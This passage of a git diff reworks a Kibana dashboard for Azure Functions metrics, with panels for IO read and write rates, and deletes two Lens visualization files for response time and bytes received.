{ + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "017dace0-c878-45e7-8d98-bfba5bdade86" + ], + "layerId": "0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "bf621d88-b10b-4d8b-86fc-33034ed0fdc9", + "xAccessor": "e2344323-fc84-49dc-9a63-ff7cc0ac618a" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The rate at which the app process is issuing read I/O operations.", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e16f3e88-0dc5-490a-b45d-86b3dbd359a3", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The rate at which the app process is writing bytes to I/O operations.", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "ba3dfc7e-d929-4dac-ba7e-d979652ec83a", + "w": 24, + "x": 24, + "y": 59 + }, + "panelIndex": "ba3dfc7e-d929-4dac-ba7e-d979652ec83a", + "title": "IO Write Bytes Per Second", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The rate at which the app process is issuing read I/O operations.", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e16f3e88-0dc5-490a-b45d-86b3dbd359a3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e16f3e88-0dc5-490a-b45d-86b3dbd359a3": { + "columnOrder": [ + "c5f39387-452a-4a77-8c48-831ecf41d972", + "d59f84c1-e509-4b82-bb73-8b30500124ec", + "32a41b5b-b737-4fd0-8b22-4a009d9c5555" + ], + "columns": { + "32a41b5b-b737-4fd0-8b22-4a009d9c5555": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.io_read_operations_per_second.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "e16f3e88-0dc5-490a-b45d-86b3dbd359a3": { - "columnOrder": [ - "c5f39387-452a-4a77-8c48-831ecf41d972", - "d59f84c1-e509-4b82-bb73-8b30500124ec", - "32a41b5b-b737-4fd0-8b22-4a009d9c5555" - ], - "columns": { - "32a41b5b-b737-4fd0-8b22-4a009d9c5555": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.io_read_operations_per_second.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.io_read_operations_per_second.total" - }, - "c5f39387-452a-4a77-8c48-831ecf41d972": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "32a41b5b-b737-4fd0-8b22-4a009d9c5555", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "d59f84c1-e509-4b82-bb73-8b30500124ec": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.io_read_operations_per_second.total" + }, + "c5f39387-452a-4a77-8c48-831ecf41d972": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "32a41b5b-b737-4fd0-8b22-4a009d9c5555", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "32a41b5b-b737-4fd0-8b22-4a009d9c5555" - ], - "layerId": "e16f3e88-0dc5-490a-b45d-86b3dbd359a3", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "c5f39387-452a-4a77-8c48-831ecf41d972", - "xAccessor": "d59f84c1-e509-4b82-bb73-8b30500124ec" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "showCurrentTimeMarker": false, - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The rate at which the app process is issuing read I/O operations.", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "dc27d0ce-7296-4640-8bcd-d23a8f4830ab", - "w": 24, - "x": 0, - "y": 74 - }, - "panelIndex": "dc27d0ce-7296-4640-8bcd-d23a8f4830ab", - "title": "IO Read Operations Per Second", - "type": "lens", - "version": "8.7.1" + "d59f84c1-e509-4b82-bb73-8b30500124ec": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "32a41b5b-b737-4fd0-8b22-4a009d9c5555" + ], + "layerId": "e16f3e88-0dc5-490a-b45d-86b3dbd359a3", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "c5f39387-452a-4a77-8c48-831ecf41d972", + "xAccessor": "d59f84c1-e509-4b82-bb73-8b30500124ec" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "line", + "showCurrentTimeMarker": false, + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The rate at which the app process is issuing wite I/O operations.", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-effd480b-5d45-4c7e-9883-114e91117829", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The rate at which the app process is issuing read I/O operations.", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "dc27d0ce-7296-4640-8bcd-d23a8f4830ab", + "w": 24, + "x": 0, + "y": 74 + }, + "panelIndex": "dc27d0ce-7296-4640-8bcd-d23a8f4830ab", + "title": "IO Read Operations Per Second", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The rate at which the app process is issuing wite I/O operations.", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-effd480b-5d45-4c7e-9883-114e91117829", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "effd480b-5d45-4c7e-9883-114e91117829": { + "columnOrder": [ + "62dfa6f9-8995-4b01-8038-0a32c921ce4e", + "fb0c0a99-931d-407b-90e1-a7695f4e877a", + "4ff3447e-d940-4369-8cec-7f6ef83dd20f" + ], + "columns": { + "4ff3447e-d940-4369-8cec-7f6ef83dd20f": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.io_write_operations_per_second.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "effd480b-5d45-4c7e-9883-114e91117829": { - "columnOrder": [ - "62dfa6f9-8995-4b01-8038-0a32c921ce4e", - "fb0c0a99-931d-407b-90e1-a7695f4e877a", - "4ff3447e-d940-4369-8cec-7f6ef83dd20f" - ], - "columns": { - "4ff3447e-d940-4369-8cec-7f6ef83dd20f": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.io_write_operations_per_second.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.io_write_operations_per_second.total" - }, - "62dfa6f9-8995-4b01-8038-0a32c921ce4e": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "4ff3447e-d940-4369-8cec-7f6ef83dd20f", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "fb0c0a99-931d-407b-90e1-a7695f4e877a": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.io_write_operations_per_second.total" + }, + "62dfa6f9-8995-4b01-8038-0a32c921ce4e": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "4ff3447e-d940-4369-8cec-7f6ef83dd20f", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "4ff3447e-d940-4369-8cec-7f6ef83dd20f" - ], - "layerId": "effd480b-5d45-4c7e-9883-114e91117829", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "62dfa6f9-8995-4b01-8038-0a32c921ce4e", - "xAccessor": "fb0c0a99-931d-407b-90e1-a7695f4e877a" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The rate at which the app process is issuing wite I/O operations.", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "f907a3c8-a7aa-4cb8-8708-e316bb3cdeb6", - "w": 24, - "x": 24, - "y": 74 - }, - "panelIndex": "f907a3c8-a7aa-4cb8-8708-e316bb3cdeb6", - "title": "IO Write Operations Per Second", - "type": "lens", - "version": "8.7.1" - } - ], - "timeRestore": false, - "title": "[Azure Functions] Overview", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-08-25T09:01:59.889Z", - "id": "azure_functions-5b40c9c0-33d4-11ee-8d85-2d7adebebd1b", - "migrationVersion": { - "dashboard": "8.7.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "58a522e8-acf6-4ad1-a5cc-a699ce9c26c0:indexpattern-datasource-layer-f6c3c469-2e64-4120-b144-997fb70575e2", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b9d5606f-9607-4c90-a75f-c2857b266bfa:indexpattern-datasource-layer-113434b9-c581-4b79-9344-13864154c598", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b9d5606f-9607-4c90-a75f-c2857b266bfa:60014cf3-d9b4-46e8-ae69-999d31086fbc", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "44c459b4-623b-4534-ba78-8904669ae9cb:indexpattern-datasource-layer-8e323fe9-19c2-405d-bbf6-ba61dc9a190f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9196bdde-1f73-46f5-97f6-09db15a28b61:indexpattern-datasource-layer-b0c25d59-67fb-4970-8b15-1da58db41925", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5430e8a9-47ae-4c82-96b7-b0287026409f:indexpattern-datasource-layer-4689dc73-dc78-4c03-b975-62264d68c33b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7a4bc820-cc0e-40fb-9aee-83ccf7615fa2:indexpattern-datasource-layer-54edca01-9fb6-444a-8d98-ddb0ff36f9be", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "266a1bc1-c35b-4959-96c1-5d799a98754c:indexpattern-datasource-layer-419ba4b9-c54a-4e44-b7dc-475a2b04e4a8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5ef0d281-2eff-415a-ac37-d778985db835:indexpattern-datasource-layer-8d0f0cfa-b115-4100-ba7e-1cadee108055", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "4f589bdd-7bbf-4b5e-88f7-68272155780d:indexpattern-datasource-layer-750303c4-2d5f-4b67-8018-cba6ccc3e3f8", - "type": "index-pattern" - }, - { - "id": "azure_functions-7f0826e0-33b2-11ee-8d85-2d7adebebd1b", - "name": "96b12503-3f63-4f80-9419-f8d25b7356fc:panel_96b12503-3f63-4f80-9419-f8d25b7356fc", - "type": "lens" - }, - { - "id": "metrics-*", - "name": "578f6fe3-6edb-4678-b13c-1e9510f1942b:indexpattern-datasource-layer-fa95f5df-3ddf-44ed-88b8-793641935e0a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f7c59600-cc99-4d51-b8f8-20976818476a:indexpattern-datasource-layer-cc027ebf-f1dc-44ef-8907-7b7a407a7fe0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ba3dfc7e-d929-4dac-ba7e-d979652ec83a:indexpattern-datasource-layer-0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "dc27d0ce-7296-4640-8bcd-d23a8f4830ab:indexpattern-datasource-layer-e16f3e88-0dc5-490a-b45d-86b3dbd359a3", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f907a3c8-a7aa-4cb8-8708-e316bb3cdeb6:indexpattern-datasource-layer-effd480b-5d45-4c7e-9883-114e91117829", - "type": "index-pattern" + "fb0c0a99-931d-407b-90e1-a7695f4e877a": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "4ff3447e-d940-4369-8cec-7f6ef83dd20f" + ], + "layerId": "effd480b-5d45-4c7e-9883-114e91117829", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "62dfa6f9-8995-4b01-8038-0a32c921ce4e", + "xAccessor": "fb0c0a99-931d-407b-90e1-a7695f4e877a" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The rate at which the app process is issuing wite I/O operations.", + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "metrics-*", - "name": "controlGroup_ff8243f3-9c96-4cb0-b703-0af0107bc8f7:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 15, + "i": "f907a3c8-a7aa-4cb8-8708-e316bb3cdeb6", + "w": 24, + "x": 24, + "y": 74 }, - { - "id": "metrics-*", - "name": "controlGroup_bebd2bf5-eb88-4157-b86b-e6fd9e322b13:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "f907a3c8-a7aa-4cb8-8708-e316bb3cdeb6", + "title": "IO Write Operations Per Second", + "type": "lens", + "version": "8.7.1" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Azure Functions] Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "58a522e8-acf6-4ad1-a5cc-a699ce9c26c0:indexpattern-datasource-layer-f6c3c469-2e64-4120-b144-997fb70575e2", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b9d5606f-9607-4c90-a75f-c2857b266bfa:indexpattern-datasource-layer-113434b9-c581-4b79-9344-13864154c598", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b9d5606f-9607-4c90-a75f-c2857b266bfa:60014cf3-d9b4-46e8-ae69-999d31086fbc", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "44c459b4-623b-4534-ba78-8904669ae9cb:indexpattern-datasource-layer-8e323fe9-19c2-405d-bbf6-ba61dc9a190f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9196bdde-1f73-46f5-97f6-09db15a28b61:indexpattern-datasource-layer-b0c25d59-67fb-4970-8b15-1da58db41925", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5430e8a9-47ae-4c82-96b7-b0287026409f:indexpattern-datasource-layer-4689dc73-dc78-4c03-b975-62264d68c33b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7a4bc820-cc0e-40fb-9aee-83ccf7615fa2:indexpattern-datasource-layer-54edca01-9fb6-444a-8d98-ddb0ff36f9be", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "266a1bc1-c35b-4959-96c1-5d799a98754c:indexpattern-datasource-layer-419ba4b9-c54a-4e44-b7dc-475a2b04e4a8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5ef0d281-2eff-415a-ac37-d778985db835:indexpattern-datasource-layer-8d0f0cfa-b115-4100-ba7e-1cadee108055", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "4f589bdd-7bbf-4b5e-88f7-68272155780d:indexpattern-datasource-layer-750303c4-2d5f-4b67-8018-cba6ccc3e3f8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "578f6fe3-6edb-4678-b13c-1e9510f1942b:indexpattern-datasource-layer-fa95f5df-3ddf-44ed-88b8-793641935e0a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f7c59600-cc99-4d51-b8f8-20976818476a:indexpattern-datasource-layer-cc027ebf-f1dc-44ef-8907-7b7a407a7fe0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ba3dfc7e-d929-4dac-ba7e-d979652ec83a:indexpattern-datasource-layer-0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "dc27d0ce-7296-4640-8bcd-d23a8f4830ab:indexpattern-datasource-layer-e16f3e88-0dc5-490a-b45d-86b3dbd359a3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f907a3c8-a7aa-4cb8-8708-e316bb3cdeb6:indexpattern-datasource-layer-effd480b-5d45-4c7e-9883-114e91117829", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_ff8243f3-9c96-4cb0-b703-0af0107bc8f7:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_bebd2bf5-eb88-4157-b86b-e6fd9e322b13:optionsListDataView", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "96b12503-3f63-4f80-9419-f8d25b7356fc:indexpattern-datasource-layer-5e26da41-85b9-4f3d-b666-9b027f19f4c0", + "id": "metrics-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/azure_functions/kibana/lens/azure_functions-1e62d580-3491-11ee-8d85-2d7adebebd1b.json b/packages/azure_functions/kibana/lens/azure_functions-1e62d580-3491-11ee-8d85-2d7adebebd1b.json deleted file mode 100644 index b3216f8e59d..00000000000 --- a/packages/azure_functions/kibana/lens/azure_functions-1e62d580-3491-11ee-8d85-2d7adebebd1b.json +++ /dev/null @@ -1,186 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "59e32faf-6efe-4b99-806e-0022e95bfe71": { - "columnOrder": [ - "b6caccad-3379-41e0-a011-efd0aa4c0268", - "de1705b8-3559-46ee-be47-0998ab9e9ce0", - "51003b73-f78c-4ed2-8e9a-d5e6d7d23239" - ], - "columns": { - "51003b73-f78c-4ed2-8e9a-d5e6d7d23239": { - "dataType": "number", - "filter": { - "language": "kuery", - "query": "azure.metrics.http_response_time.avg: *" - }, - "isBucketed": false, - "label": "Average of azure.functions.http_response_time.avg", - "operationType": "average", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.http_response_time.avg" - }, - "b6caccad-3379-41e0-a011-efd0aa4c0268": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "51003b73-f78c-4ed2-8e9a-d5e6d7d23239", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "de1705b8-3559-46ee-be47-0998ab9e9ce0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": "azure.metrics.http_response_time.avg: *", - "disabled": false, - "index": "0b109d13-9358-4287-8292-7924e980f073", - "key": "query", - "negate": false, - "type": "custom", - "value": "{\"bool\":{\"filter\":[{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"exists\":{\"field\":\"azure.metrics.http_response_time.avg\"}}]}}],\"must\":[],\"must_not\":[],\"should\":[]}}" - }, - "query": { - "bool": { - "filter": [ - { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "exists": { - "field": "azure.metrics.http_response_time.avg" - } - } - ] - } - } - ], - "must": [], - "must_not": [], - "should": [] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "data_stream.dataset : \"azure.function\" " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "51003b73-f78c-4ed2-8e9a-d5e6d7d23239" - ], - "collapseFn": "", - "layerId": "59e32faf-6efe-4b99-806e-0022e95bfe71", - "layerType": "data", - "seriesType": "line", - "splitAccessor": "b6caccad-3379-41e0-a011-efd0aa4c0268", - "xAccessor": "de1705b8-3559-46ee-be47-0998ab9e9ce0" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "Response time", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-08-13T19:12:36.830Z", - "id": "azure_functions-1e62d580-3491-11ee-8d85-2d7adebebd1b", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-59e32faf-6efe-4b99-806e-0022e95bfe71", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0b109d13-9358-4287-8292-7924e980f073", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/azure_functions/kibana/lens/azure_functions-7f0826e0-33b2-11ee-8d85-2d7adebebd1b.json b/packages/azure_functions/kibana/lens/azure_functions-7f0826e0-33b2-11ee-8d85-2d7adebebd1b.json deleted file mode 100644 index 7540ae1ae4f..00000000000 --- a/packages/azure_functions/kibana/lens/azure_functions-7f0826e0-33b2-11ee-8d85-2d7adebebd1b.json +++ /dev/null @@ -1,147 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "5e26da41-85b9-4f3d-b666-9b027f19f4c0": { - "columnOrder": [ - "e3e826ac-4145-4caa-97c7-0074740c3bde", - "4d55692b-10e3-4d58-8bc0-2973e9d8bd58", - "f807ce10-f26f-4f0a-a838-2baea3bb5ac2" - ], - "columns": { - "4d55692b-10e3-4d58-8bc0-2973e9d8bd58": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e3e826ac-4145-4caa-97c7-0074740c3bde": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "f807ce10-f26f-4f0a-a838-2baea3bb5ac2", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "f807ce10-f26f-4f0a-a838-2baea3bb5ac2": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.bytes_received.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.bytes_received.total" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "data_stream.dataset : \"azure.function\" " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "f807ce10-f26f-4f0a-a838-2baea3bb5ac2" - ], - "layerId": "5e26da41-85b9-4f3d-b666-9b027f19f4c0", - "layerType": "data", - "seriesType": "line", - "splitAccessor": "e3e826ac-4145-4caa-97c7-0074740c3bde", - "xAccessor": "4d55692b-10e3-4d58-8bc0-2973e9d8bd58" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "Bytes Received", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-08-25T08:51:40.052Z", - "id": "azure_functions-7f0826e0-33b2-11ee-8d85-2d7adebebd1b", - "migrationVersion": { - "lens": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5e26da41-85b9-4f3d-b666-9b027f19f4c0", - "type": "index-pattern" - 